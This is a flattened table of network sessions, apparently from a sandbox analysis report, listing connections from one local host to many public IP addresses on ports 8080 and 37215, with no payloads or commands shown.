                                                        26646192.168.2.2355334128.108.67.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26647192.168.2.2358834197.75.184.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26648192.168.2.2338008184.231.244.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26649192.168.2.2341970200.107.163.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26650192.168.2.234436070.111.199.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26651192.168.2.2339110207.219.29.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26652192.168.2.2350688162.189.166.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26653192.168.2.235703667.249.162.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26654192.168.2.233873270.149.254.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26655192.168.2.2359730187.138.6.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26656192.168.2.234310817.171.147.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26657192.168.2.235992680.85.77.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26658192.168.2.2339162180.124.55.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26659192.168.2.235821237.132.133.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26660192.168.2.2346684132.115.218.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26661192.168.2.233985241.135.114.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26662192.168.2.235708451.136.220.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26663192.168.2.233394075.73.159.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26664192.168.2.2340918210.162.134.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26665192.168.2.234771240.205.148.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26666192.168.2.2334860160.201.148.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26667192.168.2.2352718207.129.137.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26668192.168.2.2352324152.155.6.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26669192.168.2.2334644186.29.237.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26670192.168.2.2359836143.241.103.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26671192.168.2.2345740208.18.155.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26672192.168.2.2356228164.133.138.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26673192.168.2.2346628118.172.180.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26674192.168.2.2335482171.160.129.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26675192.168.2.2339332141.165.67.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26676192.168.2.2339562208.199.44.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26677192.168.2.233511641.70.107.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26678192.168.2.2357220106.178.128.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26679192.168.2.234334838.102.2.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26680192.168.2.2341568111.223.112.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26681192.168.2.2351760134.127.149.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26682192.168.2.2335100220.3.21.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26683192.168.2.235071847.154.125.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26684192.168.2.235165670.149.66.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26685192.168.2.2349226198.163.243.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26686192.168.2.2355242117.228.72.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26687192.168.2.2350596103.208.178.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26688192.168.2.234682691.140.142.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26689192.168.2.2337710142.191.200.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26690192.168.2.2343116154.160.236.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26691192.168.2.234901079.54.69.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26692192.168.2.235482657.10.224.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26693192.168.2.235781837.74.31.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26694192.168.2.234847251.214.230.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26695192.168.2.2358788114.231.163.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26696192.168.2.233377865.55.106.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26697192.168.2.2358272149.8.72.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26698192.168.2.235132835.163.45.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26699192.168.2.2345762178.155.71.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26700192.168.2.2341706100.184.47.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26701192.168.2.2352298162.172.103.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26702192.168.2.233992470.248.86.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26703192.168.2.234112071.85.44.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26704192.168.2.2358468189.199.214.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26705192.168.2.234251266.112.144.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26706192.168.2.2357020197.17.180.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26707192.168.2.2357834173.229.241.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26708192.168.2.2352842118.7.167.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26709192.168.2.236022436.150.102.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26710192.168.2.2353356124.85.9.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26711192.168.2.233381867.121.18.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26712192.168.2.236091870.64.167.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26713192.168.2.234044813.80.104.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26714192.168.2.2354812117.125.235.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26715192.168.2.23486501.201.208.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26716192.168.2.233622653.229.98.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26717192.168.2.234081441.71.27.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26718192.168.2.2347494174.187.213.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26719192.168.2.2347728200.63.60.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26720192.168.2.2341094191.94.149.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26721192.168.2.234281237.9.214.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26722192.168.2.2334504212.25.224.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26723192.168.2.233374660.153.145.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26724192.168.2.2338598172.114.99.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26725192.168.2.234778448.128.227.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26726192.168.2.2338998199.213.197.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26727192.168.2.2337444177.54.38.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26728192.168.2.2345596132.32.103.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26729192.168.2.234477824.32.7.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26730192.168.2.2359852158.222.28.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26731192.168.2.2349766116.41.34.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26732192.168.2.2336986116.43.50.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26733192.168.2.235576249.62.61.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26734192.168.2.235465494.7.70.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26735192.168.2.2359100138.119.27.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26736192.168.2.235726636.214.150.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26737192.168.2.2347394211.237.109.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26738192.168.2.234538437.168.139.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26739192.168.2.2339092100.179.250.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26740192.168.2.23420882.110.123.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26741192.168.2.235562294.235.154.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26742192.168.2.2347676196.186.101.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26743192.168.2.2343354196.140.119.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26744192.168.2.235300071.205.107.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26745192.168.2.2349368218.49.32.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26746192.168.2.235272490.50.220.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26747192.168.2.2340022137.42.214.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26748192.168.2.2340668155.9.82.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26749192.168.2.2336214183.42.161.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26750192.168.2.234259844.45.17.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26751192.168.2.234981887.238.20.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26752192.168.2.2338096208.216.154.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26753192.168.2.233566839.235.80.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26754192.168.2.234752073.108.114.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26755192.168.2.233364468.179.168.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26756192.168.2.23333862.36.98.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26757192.168.2.234588437.34.95.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26758192.168.2.2360312158.17.219.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26759192.168.2.2340928201.38.109.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26760192.168.2.2356404126.155.51.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26761192.168.2.2340444202.129.67.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26762192.168.2.2347326134.249.112.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26763192.168.2.235836476.98.43.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26764192.168.2.233983238.34.251.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26765192.168.2.2342960154.157.169.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26766192.168.2.235174451.205.15.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26767192.168.2.235428625.162.117.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26768192.168.2.2337572222.15.8.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26769192.168.2.2337680149.70.157.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26770192.168.2.2360224189.94.123.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26771192.168.2.2333316160.39.165.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26772192.168.2.2346642115.167.194.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26773192.168.2.2345878206.83.79.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26774192.168.2.235187640.121.214.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26775192.168.2.234699873.58.227.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26776192.168.2.2358960182.114.230.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26777192.168.2.2337966168.242.218.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26778192.168.2.233503817.28.175.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26779192.168.2.23331844.208.204.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26780192.168.2.2350036157.139.144.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26781192.168.2.234479041.75.85.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26782192.168.2.233858441.30.87.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26783192.168.2.234056241.45.168.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26784192.168.2.2346794157.117.84.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26785192.168.2.2338598125.233.231.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26786192.168.2.235702489.198.170.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26787192.168.2.2347168156.224.107.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26788192.168.2.2334716157.154.169.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26789192.168.2.2342168157.189.16.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26790192.168.2.2339120157.0.113.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26791192.168.2.2354016197.114.137.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26792192.168.2.2340712123.63.209.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26793192.168.2.2352726133.92.252.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26794192.168.2.2351364157.220.238.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26795192.168.2.235699413.66.163.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26796192.168.2.2348066157.60.14.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26797192.168.2.235319641.216.130.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26798192.168.2.2348598197.57.112.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26799192.168.2.236029643.193.24.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26800192.168.2.2350574157.132.48.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26801192.168.2.2343512197.69.132.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26802192.168.2.233823237.189.94.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26803192.168.2.2337648197.172.130.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26804192.168.2.233496637.59.216.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26805192.168.2.2359556122.107.70.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26806192.168.2.235161272.253.184.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26807192.168.2.2359358157.205.154.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26808192.168.2.233751241.94.160.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26809192.168.2.2342380197.60.110.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26810192.168.2.236079041.19.231.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26811192.168.2.2341588197.98.199.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26812192.168.2.233808846.49.23.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26813192.168.2.2333190157.253.203.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26814192.168.2.2352246157.230.198.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26815192.168.2.235283041.27.111.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26816192.168.2.235042441.228.55.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26817192.168.2.2352930197.102.160.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26818192.168.2.234187841.104.47.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26819192.168.2.2359500155.95.5.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26820192.168.2.236038641.20.40.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26821192.168.2.2346690197.220.121.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26822192.168.2.2344602197.81.158.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26823192.168.2.2336522157.3.238.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26824192.168.2.2354634197.168.112.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26825192.168.2.234092841.154.13.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26826192.168.2.2352612197.141.158.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26827192.168.2.233331841.60.120.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26828192.168.2.234047041.254.111.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26829192.168.2.2360396157.203.2.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26830192.168.2.234782858.13.97.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26831192.168.2.2345648157.27.85.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26832192.168.2.2350110197.80.15.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26833192.168.2.2342410157.71.181.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26834192.168.2.2343896139.4.199.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26835192.168.2.2336548157.176.24.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26836192.168.2.235966041.206.115.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26837192.168.2.2345376167.124.223.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26838192.168.2.2340772108.127.205.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26839192.168.2.2347874157.233.45.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26840192.168.2.2335442197.117.219.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26841192.168.2.2354986197.225.7.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26842192.168.2.2348656197.15.168.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26843192.168.2.2358792112.139.214.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26844192.168.2.2338108197.162.192.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26845192.168.2.2344588157.111.175.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26846192.168.2.2354044197.202.108.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26847192.168.2.2333218197.135.17.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26848192.168.2.235663041.122.239.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26849192.168.2.234592848.229.158.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26850192.168.2.234953641.241.42.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26851192.168.2.2359198157.43.184.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26852192.168.2.2350120157.150.144.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26853192.168.2.235374841.255.22.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26854192.168.2.2340438197.238.40.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26855192.168.2.2359664197.93.171.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26856192.168.2.2353718157.231.174.4037215
